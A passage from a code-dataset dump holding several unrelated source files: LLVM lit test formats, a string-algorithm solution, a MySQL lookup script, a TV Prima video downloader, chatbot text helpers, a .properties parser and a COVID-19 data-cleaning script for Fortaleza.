err, exitCode = lit.util.executeCommand(cmd)\n\n diags = out + err\n if not exitCode and not diags.strip():\n return lit.Test.PASS, \"\"\n\n # Try to include some useful information.\n report = \"\"\"Command: %s\\n\"\"\" % \" \".join([\"'%s'\" % a for a in cmd])\n if self.useTempInput:\n report += \"\"\"Temporary File: %s\\n\"\"\" % tmp.name\n report += \"--\\n%s--\\n\" \"\" % open(tmp.name).read()\n report += \"\"\"Output:\\n--\\n%s--\"\"\" % diags\n\n return lit.Test.FAIL, report\n\n\n###\n\n# Check exit code of a simple executable with no input\nclass ExecutableTest(FileBasedTest):\n def execute(self, test, litConfig):\n if test.config.unsupported:\n return lit.Test.UNSUPPORTED\n\n out, err, exitCode = lit.util.executeCommand(test.getSourcePath())\n\n if not exitCode:\n return lit.Test.PASS, \"\"\n\n return lit.Test.FAIL, out + err\n","sub_path":"llvm/utils/lit/lit/formats/base.py","file_name":"base.py","file_ext":"py","file_size_in_byte":5119,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"58"}
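+
+A minimal sketch of the filtering rules FileBasedTest applies before yielding a test; the suffix and exclude values here are placeholders, not lit's real defaults:
+
+import os
+
+def is_test_file(filename, excludes=frozenset(), suffixes=frozenset({'.ll', '.c'})):
+    # Dot files and explicitly excluded names never become tests.
+    if filename.startswith('.') or filename in excludes:
+        return False
+    # Otherwise the extension must be one of the configured suffixes.
+    _base, ext = os.path.splitext(filename)
+    return ext in suffixes
+
+print(is_test_file('loop.ll'))      # True
+print(is_test_file('.hidden.ll'))   # False
+print(is_test_file('notes.txt'))    # False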
+{"seq_id":"247581777","text":"#!/usr/bin/env python\n# coding=utf-8\n\n\nclass Solution(object):\n\n \"\"\"\n Given a string, find the length of the longest substring without \n repeating characters. For example, the longest substring without \n repeating letters for \"abcabcbb\" is \"abc\", which the length is 3. \n For \"bbbbb\" the longest substring is \"b\", with the length of 1.\n \"\"\"\n\n def lengthOfLongestSubstring(self, s):\n \"\"\"\n :type s: str\n :rtype: int\n\n test:\n >>> Solution().lengthOfLongestSubstring(\"abcabcbb\")\n 3\n >>> Solution().lengthOfLongestSubstring(\"bbbbb\")\n 1\n >>> Solution().lengthOfLongestSubstring(\"kkingg\")\n 4\n \"\"\"\n longest, start, visited = 0, 0, [False for _ in xrange(256)]\n for i, c in enumerate(s):\n if visited[ord(c)]:\n while c != s[start]:\n visited[ord(s[start])] = False\n start += 1\n start += 1\n else:\n visited[ord(c)] = True\n longest = max(longest, i - start + 1)\n return longest\n\n\nif __name__ == '__main__':\n import doctest\n doctest.testmod()\n","sub_path":"Python/003_Longest_Substring_Without_Repeating_Characters.py","file_name":"003_Longest_Substring_Without_Repeating_Characters.py","file_ext":"py","file_size_in_byte":1170,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"58"}
+{"seq_id":"461847265","text":"#!/usr/bin/python3\n\"\"\"\ntakes in the name of a state as an argument and\nlists all cities of that state, using the database hbtn_0e_4_usa\n\"\"\"\nimport MySQLdb\nfrom sys import argv\n\n\nif __name__ == \"__main__\":\n db = MySQLdb.connect(host=\"localhost\", port=3306,\n user=argv[1], passwd=argv[2], db=argv[3])\n cur = db.cursor()\n sql = \"SELECT cities.name FROM cities JOIN states ON\\\n cities.state_id = states.id WHERE states.name=%s\\\n ORDER BY cities.id\"\n num_rows = cur.execute(sql, (argv[4],))\n rows = cur.fetchall()\n result = []\n i = 0\n for row in rows:\n result.append(rows[i][0])\n i += 1\n joined = \", \".join(result)\n print(joined)\n cur.close()\n db.close()\n","sub_path":"0x0F-python-object_relational_mapping/5-filter_cities.py","file_name":"5-filter_cities.py","file_ext":"py","file_size_in_byte":730,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"58"}
+{"seq_id":"249236839","text":"#!/usr/bin/env python3\n#\n__author__ = \"Jakub Lužný\"\n__desc__ = \"TV Prima Videoarchiv\"\n__url__ = r\"http://(www.)?iprima\\.cz/videoarchiv.*\"\n\nimport re,os.path,random,math\nimport xml.etree.ElementTree as ElementTree\nfrom urllib.request import urlopen, Request\n\nclass PrimaEngine:\n\n def __init__(self, url):\n self.url = url\n self.page = urlopen(url).read().decode('utf-8')\n\n def movies(self): \n return [ ('0', re.findall(r'', self.page)[0]) ]\n \n def qualities(self):\n return [ ('high', 'Vysoká'), ('low', 'Nízká')]\n\n def download(self, quality, movie):\n reg = r\"LiveboxPlayer\\.init\\('embed_here.*?','\\d+','\\d+', '(.+\\.mp4)', '(.+\\.mp4)'\"\n r = re.findall(reg, self.page)\n if not r:\n r = re.findall( reg.replace('mp4', 'flv') , self.page)\n hq, lq = r[0]\n \n playpath = \"\"\n if quality == \"low\":\n playpath = lq\n else:\n playpath = hq\n\n playerUrl = 'http://embed.livebox.cz/iprima/player-1.js?__tok{}__={}'.format(\n math.floor(random.random()*1073741824),\n math.floor(random.random()*1073741824))\n \n req = Request(playerUrl, None, {'Referer' : self.url} )\n player = urlopen(req).read().decode('utf-8')\n \n baseUrl = re.findall( r\"stream: '(.+?)'\", player)[0]\n\n return (\"rtmp\", playpath[:-3]+'flv' , { 'url' : baseUrl+'/'+playpath,\n 'rtmpdump_args' : '--live'})\n","sub_path":"engines/prima.py","file_name":"prima.py","file_ext":"py","file_size_in_byte":1568,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"58"}
+{"seq_id":"135459818","text":"\"\"\"A collection of function for doing my project.\"\"\"\n\n# This imports some extra code, making it available for us to use later\nimport string\nimport random\nimport nltk\nimport time\nimport threading\nfrom threading import Timer\n\n# to check if the input is a question\n# from Assignment 3\ndef is_question(input_string):\n \"\"\"check if the input string is a question\n and returns True if it is\"\"\"\n \n if '?' in input_string:\n output = True\n \n else:\n output = False\n \n return output\n\n# to check if the input is an exclamation\ndef is_exclamation(input_string):\n \"\"\"check if the input is an exclamation\n and returns True if it is\"\"\"\n \n if \"!\" in input_string:\n output = True\n \n else:\n output = False\n \n return output\n\n# to check if the user is giving \n# a positive reply such as \"okay\", \"of course\", \"yeah\" etc.\ndef positive_reply(input_string):\n \"\"\"check if the input includes any of the following words\n and return True if it does\"\"\"\n \n for element in input_string:\n \n if \"okay\" in input_string:\n return True\n \n elif \"of course\" in input_string:\n return True\n \n elif \"sure\" in input_string:\n return True\n \n elif \"yeah\" in input_string:\n return True\n \n elif \"ya\" in input_string:\n return True\n \n elif \"yes\" in input_string:\n return True\n \n return False\n\n# check if the user is tired or doesn't want to talk anymore\n# by check if the input has any of the following words\ndef check_mood(input_string):\n \"\"\"check if the input contains any of the following words\n and returns True if it does\"\"\"\n \n num = 0\n \n if \"...\" in input_string:\n return True\n \n elif \"I'm done\" in input_string:\n return True\n \n elif \"I don't want to talk anymore\" in input_string:\n return True\n \n elif \"I'm tired\" in input_string:\n return True\n \n elif \"dislike\" in input_string:\n return True\n \n elif \"hate\" in input_string:\n return True\n \n return False\n\n# to check if the user is confused about what is happening\n# or if she/he is confused about what she/he can do\ndef very_confused(input_message):\n \"\"\"check if the input contains more than two '?' \n and returns True it does\"\"\"\n \n num = 0\n length = 0\n \n while length <= len(input_message):\n \n if \"??\" in input_message:\n num = num + 1\n \n length = length +1\n \n if num != 0:\n return True\n \n return False\n\n# to agree with the user's input message with a default agree value\ndef agreeable(input_string, agree = \"Me too!!\"):\n \"\"\"concatenate 'Me too!' 
with the input string\"\"\"\n \n while input_string is not None:\n agreed_output = agree + \" \" + input_string\n \n return agreed_output\n\n# we check if the input_list contains things from check_list\n# if it does, set output to return_list and return output\n# from assignment 3\ndef selector(input_list, check_list, return_list):\n \"\"\"if input_list contains element from check_list\n return a random element in the return_list\"\"\"\n\n output = None\n \n for word in input_list:\n \n if word in check_list:\n output = random.choice(return_list)\n break\n\n return output\n\n# removing all the puncuation in the input string\n# from assignment 3\ndef remove_punctuation(input_string):\n \"\"\"remove all puncuations in input_string\"\"\"\n \n out_string = ''\n \n for char in input_string:\n \n if char not in string.punctuation:\n out_string += char\n \n return out_string\n\n# prepare the the text inputs for processing\n# by removing all the punctuations using remove_punctuation\n# and splitting string into words using the split method\n# from assignment 3\ndef prepare_text(input_string):\n \"\"\"prepare the text input for processing\"\"\"\n \n temp_string = input_string.lower()\n temp_string = remove_punctuation(temp_string)\n out_list = temp_string.split()\n \n return out_list\n\n# Check if there is any words from the input_string that is also any element of list_one\n# from assignment 3\ndef is_in_list(list_one, input_string): \n \"\"\"check if elements of input_string is in list_one\"\"\"\n \n num = 0\n \n for element in list_one:\n \n if element in input_string:\n return True\n \n return False\n\n# find and return an element from list_one\n# that is also in list_two or None otherwise\n# from assignment 3\ndef find_in_list(list_one, list_two):\n \"\"\"Find and return an element from list_one that is in list_two, or None otherwise.\"\"\"\n \n for element in list_one:\n \n if element in list_two:\n return element\n \n return None\n\n# we need a way to end the conversation with the chatbot\n# so if the user input \"quit\" in the input message we will end the chat\n# from assignment 3\ndef end_chat(input_list):\n \"\"\"check if 'quit' is in input_list and end chat\"\"\"\n \n if 'quit' in input_list:\n output = True\n \n else:\n output = False\n \n return output\n","sub_path":"functions.py","file_name":"functions.py","file_ext":"py","file_size_in_byte":5277,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"58"}
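+
+How the text-preparation helpers above chain together in a reply loop; the check/return word lists below are illustrative, not from the original project:
+
+import random
+import string
+
+def prepare(s):
+    # lower-case, strip punctuation, split into words (as prepare_text does)
+    cleaned = ''.join(ch for ch in s.lower() if ch not in string.punctuation)
+    return cleaned.split()
+
+def select(words, check_list, return_list):
+    # first matching word wins, reply chosen at random (as selector does)
+    for w in words:
+        if w in check_list:
+            return random.choice(return_list)
+    return None
+
+words = prepare("Hello there, bot!")
+print(select(words, ['hello', 'hi'], ['Hey!', 'Hello to you too!']))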
+{"seq_id":"296024102","text":"\"\"\" Class description goes here. \"\"\"\n\n\"\"\"Java `properties` parser.\n\nA simple parser of the *.properties files can be found in this module. It is\nnot a complete and bulletproof implementation, but it is enough for simple\nfiles.\n\nSee PropertyFile class for some considerations about the implementation.\n\"\"\"\n\nimport re\nfrom abc import ABC, abstractmethod\n\n__author__ = \"Alex Barcelo \"\n__copyright__ = \"2015 Barcelona Supercomputing Center (BSC-CNS)\"\n\n\"\"\" Make this class abstract \"\"\"\n\n\nclass PropertyFile(ABC):\n \"\"\"Abstract property-holder class.\n\n All Property Files used in dataClay must have it own class, derived from\n this one. This function provides the basic line-by-line iteration and a\n commonruntime interface, but the details on each line stored data is dependant\n on each file.\n\n WARNING: ** Not implemented **\n - Multiline property lines\n - Escaping sequences\n \"\"\"\n\n _prop_comment = re.compile(r\"\\s*([#!].*)?$\")\n _prop_regular_line = re.compile(r\"\\s*(.*?)\\s*[=:]\\s*(.*)$\")\n\n def __init__(self, file_name):\n \"\"\"Open the file (which is expected to be a properties Java file) and read.\n\n This constructor relies on subclasses implementing their own\n process_line method, which will be called for each line.\n\n :param file_object: An object-like (stream) for the \".properties\" file.\n :return:\n \"\"\"\n with open(file_name, \"r\") as file_object:\n for line in file_object:\n if not self._prop_comment.match(line):\n m = self._prop_regular_line.match(line)\n if m is not None:\n self._process_line(m.group(1), m.group(2))\n\n @abstractmethod\n def _process_line(self, key, value):\n \"\"\"Process a line of the ongoing properties file.\n\n This method should be implemented in derived classes and the internal\n class structure updated according to this properties' file needs.\n\n :param key: The key for the line being processed.\n :param value: The value (string) for the previous key.\n :return: None\n \"\"\"\n return\n\n\nclass PropertyDict(PropertyFile):\n \"\"\"Simple dictionary wrapper for a \"properties\" file.\"\"\"\n\n def __init__(self, file_name):\n super(PropertyDict, self).__init__(file_name)\n\n def _process_line(self, key, value):\n \"\"\"Simply store the values in the internal dictionary.\"\"\"\n self.__dict__[key] = value\n","sub_path":"src/dataclay/util/PropertiesFilesLoader.py","file_name":"PropertiesFilesLoader.py","file_ext":"py","file_size_in_byte":2487,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"58"}
+{"seq_id":"369314564","text":"import numpy as np\nimport pandas as pd\nimport datetime\nimport Levenshtein\n\nfrom funcoes_auxiliares.otimizacao import *\n\n\ndef delete_wrong_dates(df_atual):\n print('Excluindo datas bsurdas')\n df_atual.idadeCaso = df_atual.idadeCaso.replace(range(101,1001), float(\"nan\"))\n df_atual.loc[df_atual['idadeCaso'] == float(\"nan\"), 'faixaEtaria'] = 'Sem Informacao'\n df_atual.faixaEtaria = df_atual.faixaEtaria.fillna('Sem Informacao')\n dates = ['dataResultadoExame', 'dataInicioSintomas', 'dataColetaExame']\n optimize2(df_atual, dates)\n return df_atual\n\n\ndef remove_columns(df_atual):\n print('Removendo colunas desnecessarias')\n df_atual = df_atual.drop(columns=['idRedcap', 'classificacaoEstadoRedcap', 'idEsus', 'idSivep',\n 'bairroCasoGeocoder', 'tipoObitoMaterno', 'codigoMunicipioCaso', \n 'comorbidadeHiv', 'comorbidadeNeoplasias', 'paisCaso', 'estadoCaso',\n 'dataNascimento', 'requisicaoGal', 'laboratorioExame', 'cnesNotificacaoEsus',\n 'municipioNotificacaoEsus', 'localObito', 'comorbidadePuerperaSivep',\n 'comorbidadeHematologiaSivep', 'comorbidadeSindromeDownSivep',\n 'comorbidadeHepaticaSivep', 'comorbidadeNeurologiaSivep',\n 'comorbidadeImunodeficienciaSivep','comorbidadeRenalSivep', \n 'comorbidadeObesidadeSivep', 'gestante', 'classificacaoEstadoEsus', \n 'classificacaoFinalEsus', 'tipoTesteEsus', 'tipoLocalObito', 'classificacaoObito',\n 'evolucaoCasoEsus', 'evolucaoCasoSivep', 'tipoTesteExame',\n 'comorbidadeCardiovascularSivep', 'comorbidadeAsmaSivep', 'comorbidadeDiabetesSivep', \n 'comorbidadePneumopatiaSivep', 'classificacaoEstadoSivep', 'dataNotificacao', 'dataSolicitacaoExame',\n 'dataInternacaoSivep', 'dataEntradaUTISivep', 'dataSaidaUTISivep', 'dataEvolucaoCasoSivep',\n 'dataNotificacaoObito', 'classificacaoFinalCasoSivep'])\n return df_atual\n\ndef correct_cboEsus(df_atual):\n print(\"Corrigindo profissões\")\n for i in df_atual.cboEsus.value_counts().index.to_list():\n correcao = i.split('-')[1]\n if correcao[0] == ' ':\n correcao = correcao[1:]\n df_atual.cboEsus.replace(i, correcao, inplace=True)\n return df_atual\n\ndef filter_muni(df_atual):\n print('Filtrando dados para Fortaleza')\n correcoes = {}\n for i in df_atual.municipioCaso.value_counts().index:\n lev = Levenshtein.distance(i,'FORTALEZA')\n if lev < 4:\n correcoes[i] = 'FORTALEZA'\n dist = lev\n for i in range(len(list(correcoes))):\n df_atual.municipioCaso = df_atual.municipioCaso.replace(list(correcoes)[i], correcoes[list(correcoes)[i]])\n\n filtro = (df_atual.municipioCaso == 'FORTALEZA')\n df_atual = df_atual[filtro]\n df_atual = df_atual.drop(columns=['municipioCaso'])\n return df_atual\n\n\ndef date_correction(df_atual):\n print('Corrigindo datas')\n anoDeCont = []\n dataCaso = []\n result = df_atual.dataResultadoExame.to_list()\n sintomas = df_atual.dataInicioSintomas.to_list()\n exame = df_atual.dataColetaExame.to_list()\n\n for i in range(len(result)):\n if sintomas[i].year == 2020:\n anoDeCont.append('2020')\n dataCaso.append(sintomas[i])\n elif sintomas[i].year == 2021:\n anoDeCont.append('2021')\n dataCaso.append(sintomas[i])\n else:\n if exame[i].year == 2020:\n anoDeCont.append('2020')\n dataCaso.append(exame[i])\n elif exame[i].year == 2021:\n anoDeCont.append('2021')\n dataCaso.append(exame[i])\n else:\n if result[i].year == 2020:\n anoDeCont.append('2020')\n dataCaso.append(result[i])\n elif result[i].year == 2021:\n anoDeCont.append('2021')\n dataCaso.append(result[i])\n else:\n anoDeCont.append('Excluir')\n dataCaso.append('Excluir')\n 
df_atual['anoDeContagio'] = anoDeCont\n\n for i in df_atual.columns.to_list(): \n if i[0]+i[1]+i[2]+i[3] == 'data':\n df_atual = df_atual.drop(columns=i)\n df_atual['dataCaso'] = dataCaso\n\n indexNames = df_atual[ (df_atual['dataCaso'] == 'Excluir') |\n (df_atual['anoDeContagio'] == 'Excluir') ].index\n df_atual.drop(indexNames , inplace=True)\n\n return df_atual\n\n\ndef wrong_values(df_atual):\n print('Tratando valores errados')\n\n df_atual.bairroCaso.fillna('Indeterminado', inplace=True)\n\n df_atual.sexoCaso.replace('INDEFINIDO', df_atual.sexoCaso.value_counts().index[0], inplace=True)\n df_atual.sexoCaso.replace('I', df_atual.sexoCaso.value_counts().index[0], inplace=True)\n df_atual.sexoCaso.replace('N.I.', df_atual.sexoCaso.value_counts().index[0], inplace=True)\n df_atual.sexoCaso.fillna(df_atual.sexoCaso.value_counts().index[0], inplace=True)\n\n df_atual.resultadoFinalExame.replace('Provável', 'Caso suspeito', inplace=True)\n df_atual.resultadoFinalExame.replace('Inconclusivo', 'Caso suspeito', inplace=True)\n df_atual.resultadoFinalExame.replace('Em Análise', 'Caso suspeito', inplace=True)\n df_atual.resultadoFinalExame.fillna('Caso suspeito', inplace=True)\n # df_atual.resultadoFinalExame.replace('Negativo', 'Z Negativo', inplace=True)\n\n df_atual.racaCor.replace('Parda.0', 'Parda', inplace=True)\n df_atual.racaCor.replace('.0', 'Sem Informacao', inplace=True)\n df_atual.racaCor.fillna('Sem Informacao', inplace=True)\n df_atual.racaCor.replace('Branca.0', 'Branca', inplace=True)\n df_atual.racaCor.replace('Preta.0', 'Preta', inplace=True)\n df_atual.racaCor.replace('Amarela.0', 'Amarela', inplace=True)\n df_atual.racaCor.replace('Indígena.0', 'Indígena', inplace=True)\n\n df_atual.obitoConfirmado.replace(True, 'Verdadeiro', inplace=True)\n df_atual.obitoConfirmado.replace(False, 'Falso', inplace=True)\n df_atual.obitoConfirmado.fillna('Falso', inplace=True)\n\n return df_atual\n\n\ndef correction_bairro(df_atual, bairro_info):\n print('Corrigindo bairros')\n correcoes = {}\n bairros_cor = bairro_info.index\n for i in df_atual.bairroCaso.value_counts().index:\n dist = 20\n for j in bairros_cor:\n lev = Levenshtein.distance(i,j)\n if dist == 20 and lev < 3:\n correcoes[i] = j\n dist = lev\n elif dist < 20 and lev < dist:\n correcoes[i] = j\n dist = lev\n\n for i in range(len(list(correcoes))):\n df_atual.bairroCaso = df_atual.bairroCaso.replace(list(correcoes)[i], correcoes[list(correcoes)[i]])\n\n filtro = ~ df_atual.bairroCaso.isin(bairros_cor)\n df_atual.loc[filtro, 'bairroCaso'] = 'Indeterminado'\n\n return df_atual\n\n\ndef prof_group(df_atual):\n print('Criando grupos')\n dicGrupo = {'Técnicos e auxiliares de enfermagem' : 'Profissional da saude',\n 'Enfermeiros e afins' : 'Profissional da saude',\n 'Médico' : 'Profissional da saude',\n 'Agente Comunitário de Saúde' : 'Profissional da saude',\n 'Farmacêuticos' : 'Profissional da saude',\n 'Fisioterapeutas' : 'Profissional da saude',\n 'Cirurgião' : 'Profissional da saude',\n 'Psicólogos e psicanalistas' : 'Profissional da saude',\n 'Cuidador em Saúde' : 'Profissional da saude',\n 'Médicos clínicos' : 'Profissional da saude',\n 'Nutricionistas' : 'Profissional da saude',\n 'Policiais' : 'Policial/Exercito/Bombeiros',\n 'Outro tipo de agente de saúde ou visitador sanitário' : 'Profissional da saude',\n 'Agente de Saúde Pública' : 'Profissional da saude',\n 'Profissionais da educação física' : 'Profissionais da Educação',\n 'Vigilantes e guardas de segurança' : 'Policial/Exercito/Bombeiros',\n 'Médicos em medicina 
diagnóstica e terapêutica' : 'Profissional da saude',\n 'Terapeutas ocupacionais' : 'Profissional da saude',\n 'Condutor de Ambulância' : 'Profissional da saude',\n 'Cabos e soldados da polícia militar' : 'Policial/Exercito/Bombeiros',\n 'Oficiais generais das forças armadas' : 'Policial/Exercito/Bombeiros',\n 'Técnicos de odontologia' : 'Profissional da saude',\n 'Professor de Educação Infantil ou Ensino Fundamental' : 'Profissionais da Educação',\n 'Socorrista não médico e não enfermeiro' : 'Profissional da saude',\n 'Técnico em farmácia e em manipulação farmacêutica' : 'Profissional da saude',\n 'Engenheiros civis e afins' : 'Profissionais da área de construção',\n 'Inspetores de alunos e afins' : 'Profissionais da Educação',\n 'Biomédico' : 'Profissional da saude',\n 'Professor do Ensino Médio' : 'Profissionais da Educação',\n 'Subtenentes e sargentos da policia militar' : 'Policial/Exercito/Bombeiros',\n 'Cozinheiros' : 'Profissionais da área alimentícia',\n 'Profissional da Biotecnologia' : 'Profissional da saude',\n 'Técnicos em transportes aéreos' : 'Transporte',\n 'Contadores e afins' : 'Finanças e Secretariado',\n 'Operadores de máquinas para costura de peças do vestuário' : 'Industria textil',\n 'Outros profissionais de ensino' : 'Profissionais da Educação',\n 'Dirigentes do serviço público' : 'Finanças e Secretariado',\n 'Motoristas de veículos de cargas em geral' : 'Transporte ',\n 'Secretárias(os) executivas(os) e afins' : 'Finanças e Secretariado',\n 'Auxiliares de serviços de documentação' : 'Finanças e Secretariado',\n 'Lavadores e passadores de roupa' : 'Industria textil',\n 'Professor de Ensino Superior' : 'Profissionais da Educação',\n 'Trabalhadores no atendimento em estabelecimentos de serviços de alimentação' : 'Profissionais da área alimentícia',\n 'Trabalhadores nos serviços de manutenção de edificações' : 'Profissionais da área de construção',\n 'Oficiais superiores da polícia militar' : 'Policial/Exercito/Bombeiros',\n 'Arquitetos e urbanistas' : 'Profissionais da área de construção',\n 'Assistentes sociais e economistas domésticos' : 'Finanças e Secretariado',\n 'Motociclistas e ciclistas de entregas rápidas' : 'Profissionais da área alimentícia',\n 'Trabalhadores auxiliares nos serviços de alimentação' : 'Profissionais da área alimentícia',\n 'Delegados de polícia' : 'Policial/Exercito/Bombeiros',\n 'Profissionais de administração ecônomico' : 'Finanças e Secretariado',\n 'Técnicos em construção civil (edificações)' : 'Profissionais da área de construção',\n 'Bombeiros' : 'Policial/Exercito/Bombeiros',\n 'Diretores administrativos e financeiros' : 'Finanças e Secretariado',\n 'Técnico em Eletroeletrônica e Fotônica atuando na área de saúde' : 'T.I., Tecnologias e mecanica',\n 'Tenentes da polícia militar' : 'Policial/Exercito/Bombeiros',\n 'Motoristas de ônibus urbanos' : 'Transporte',\n 'Gerentes de tecnologia da informação' : 'T.I., Tecnologias e mecanica',\n 'Auxiliares de contabilidade' : 'Finanças e Secretariado',\n 'Capitães da polícia militar' : 'Policial/Exercito/Bombeiros',\n 'Ajudantes de obras civis' : 'Profissionais da área de construção',\n 'Técnicos mecânicos (ferramentas)' : 'T.I., Tecnologias e mecanica',\n 'Médicos em especialidades cirúrgicas' : 'Profissional da saude',\n 'Profissionais polivalentes da confecção de roupas' : 'Industria textil',\n 'Chefes de cozinha e afins' : 'Profissionais da área alimentícia',\n 'Professores de nível superior na educação infantil' : 'Profissionais da Educação',\n 'Eletricistas de manutenção eletroeletrônica' 
: 'T.I., Tecnologias e mecanica',\n 'Técnicos em contabilidade' : 'Finanças e Secretariado',\n 'Professores de nível médio na educação infantil' : 'Profissionais da Educação',\n 'Diretores e gerentes de instituição de serviços educacionais' : 'Profissionais da Educação',\n 'Técnicos em operações e serviços bancários' : 'Finanças e Secretariado',\n 'Padeiros' : 'Profissionais da área alimentícia',\n 'Profissionais da informação' : 'T.I., Tecnologias e mecanica',\n 'Técnicos em construção civil (obras de infraestrutura)' : 'Profissionais da área de construção',\n 'Trabalhadores em registros e informações em saúde' : 'T.I., Tecnologias e mecanica',\n 'Cabos e soldados do corpo de bombeiros militar' : 'Policial/Exercito/Bombeiros',\n 'Técnicos em eletrônica' : 'T.I., Tecnologias e mecanica',\n 'Professores do ensino médio' : 'Profissionais da Educação',\n 'Trabalhadores de segurança e atendimento aos usuários nos transportes' : 'Transporte',\n 'Engenheiros eletricistas' : 'T.I., Tecnologias e mecanica',\n 'Supervisores de serviços financeiros' : 'Finanças e Secretariado',\n 'Operadores de máquinas de costurar e montar calçados' : 'Industria textil',\n 'Supervisores de lavanderia' : 'Industria textil',\n 'Pintores de obras e revestidores de interiores (revestimentos flexíveis)' : 'Profissionais da área de construção',\n 'Administradores de tecnologia da informação' : 'T.I., Tecnologias e mecanica',\n 'Professores de nível superior do ensino fundamental (primeira a quarta séries)' : 'Profissionais da Educação',\n 'Profissionais de direitos autorais e de avaliacão de produtos dos meios de comunicação' : '',\n 'Oficiais de máquinas da marinha mercante' : 'Policial/Exercito/Bombeiros',\n 'Programadores' : 'T.I., Tecnologias e mecanica',\n 'Professores na área de formação pedagógica do ensino superior' : 'Profissionais da Educação',\n 'Professores de nível médio no ensino fundamental' : 'Profissionais da Educação',\n 'Técnicos em secretariado' : 'Finanças e Secretariado',\n 'Designers de interiores' : 'Profissionais da área de construção',\n 'Engenheiro de Alimentos' : 'Profissionais da área alimentícia',\n 'Economistas' : 'Finanças e Secretariado',\n 'Técnicos em eletricidade e eletrotécnica' : 'T.I., Tecnologias e mecanica',\n 'Engenheiros mecânicos e afins' : 'T.I., Tecnologias e mecanica',\n 'Professor de Ensino Profissionalizante' : 'Profissionais da Educação',\n 'Oficiais intermediários do corpo de bombeiros militar' : 'Policial/Exercito/Bombeiros',\n 'Trabalhadores da preparação da confecção de roupas' : 'Industria textil',\n 'Diretores de operações de serviços em instituição de intermediação financeira' : 'Finanças e Secretariado',\n 'Supervisores da construção civil' : 'Profissionais da área de construção',\n 'Gerentes de operações de serviços em empresa de transporte' : 'Transporte',\n 'Professores de educação especial' : 'Profissionais da Educação',\n 'Supervisores na confecção do vestuário' : 'Industria textil',\n 'Supervisores dos serviços de transporte' : 'Transporte',\n 'Mecânicos de manutenção de bombas' : 'T.I., Tecnologias e mecanica',\n 'Trabalhadores de instalações elétricas' : 'Profissionais da área de construção',\n 'Mecânicos de manutenção de veículos automotores' : 'T.I., Tecnologias e mecanica',\n 'Técnicos de suporte e monitoração ao usuário de tecnologia da informação.' 
: 'T.I., Tecnologias e mecanica',\n 'Subtenentes e sargentos do corpo de bombeiros militar' : 'Policial/Exercito/Bombeiros',\n 'Professores leigos no ensino fundamental' : 'Profissionais da Educação',\n 'Técnicos em manutenção e reparação de equipamentos biomédicos' : 'T.I., Tecnologias e mecanica',\n 'Pesquisadores de engenharia e tecnologia' : 'T.I., Tecnologias e mecanica',\n 'Trabalhadores artesanais da confecção de peças e tecidos' : 'Industria textil',\n 'Instrutores e professores de cursos livres' : 'Profissionais da Educação',\n 'Oficiais superiores do corpo de bombeiros militar' : 'Policial/Exercito/Bombeiros',\n 'Trabalhadores da fabricação de cerâmica estrutural para construção' : 'Profissionais da área de construção',\n 'Engenheiros em computação' : 'T.I., Tecnologias e mecanica',\n 'Supervisores da fabricação de alimentos' : 'Profissionais da área alimentícia',\n 'Técnicos em telecomunicações' : 'T.I., Tecnologias e mecanica',\n 'Mecânicos de manutenção aeronáutica' : 'T.I., Tecnologias e mecanica',\n 'Professores de nível superior no ensino fundamental de quinta a oitava série' : 'Profissionais da Educação',\n 'Desenhistas projetistas de construção civil e arquitetura' : 'Profissionais da área de construção',\n 'Supervisores da indústria têxtil' : 'Industria textil',\n 'Trabalhadores de acabamento de calçados' : 'Industria textil',\n 'Pilotos de aviação comercial' : 'Transporte',\n 'Mecânicos de instrumentos de precisão' : 'T.I., Tecnologias e mecanica',\n 'Trabalhadores agropecuários em geral' : 'Profissionais da área alimentícia',\n 'Inspetores e revisores de produção têxtil' : 'Industria textil',\n 'Instaladores e mantenedores de sistemas eletroeletrônicos de segurança' : 'T.I., Tecnologias e mecanica',\n 'Operadores de tear e máquinas similares' : 'Industria textil',\n 'Aplicadores de revestimentos cerâmicos' : 'Profissionais da área de construção',\n 'Técnicos mecânicos na manutenção de máquinas' : 'T.I., Tecnologias e mecanica',\n 'Professores de artes do ensino superior' : 'Profissionais da Educação',\n 'Técnicos do vestuário' : 'Industria textil',\n 'Supervisores de manutenção eletromecânica' : 'T.I., Tecnologias e mecanica',\n 'Vidreiros e ceramistas (arte e decoração)' : 'Profissionais da área de construção',\n 'Gerentes de obras em empresa de construção' : 'Profissionais da área de construção',\n 'Trabalhadores de tecelagem manual' : 'Industria textil',\n 'Professores do ensino profissional' : 'Profissionais da Educação',\n 'Gerentes operacionais da aviação civil' : 'Transporte',\n 'Trabalhadores polivalentes das indústrias têxteis' : 'Industria textil',\n 'Gerentes de operações de serviços em instituição de intermediação financeira' : 'Finanças e Secretariado',\n 'Tenentes do corpo de bombeiros militar' : 'Policial/Exercito/Bombeiros'}\n\n for i in range(len(list(dicGrupo))):\n df_atual.loc[df_atual.cboEsus == list(dicGrupo)[i], 'profissoes'] = dicGrupo[list(dicGrupo)[i]]\n\n df_atual.drop(columns=['cboEsus'], inplace=True)\n return df_atual\n\n\ndef processing_new_rows(df_atual):\n df_atual = remove_columns(df_atual)\n df_atual = delete_wrong_dates(df_atual)\n df_atual = correct_cboEsus(df_atual)\n df_atual = filter_muni(df_atual)\n df_atual = date_correction(df_atual)\n df_atual = wrong_values(df_atual)\n\n bairro_info = pd.read_csv(f'Base_de_dados/dados_bairros.csv', sep=',')\n bairro_info.Bairros\t= bairro_info.Bairros.str.upper()\n bairro_info = bairro_info.set_index('Bairros')\n\n df_atual = correction_bairro(df_atual, bairro_info)\n df_atual = 
prof_group(df_atual)\n\n # df_atual.sort_values(by=['resultadoFinalExame'], inplace=True) \n # df_atual.drop_duplicates(subset='identificadorCaso', keep='last', inplace=True)\n # df_atual = df_atual.drop(columns=['identificadorCaso'])\n\n\n df_atual.to_csv('Base_de_dados/dados_limpos.csv', sep=';')\n \n\n \n\n","sub_path":"funcoes_auxiliares/pre_proces.py","file_name":"pre_proces.py","file_ext":"py","file_size_in_byte":20094,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"58"}
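+
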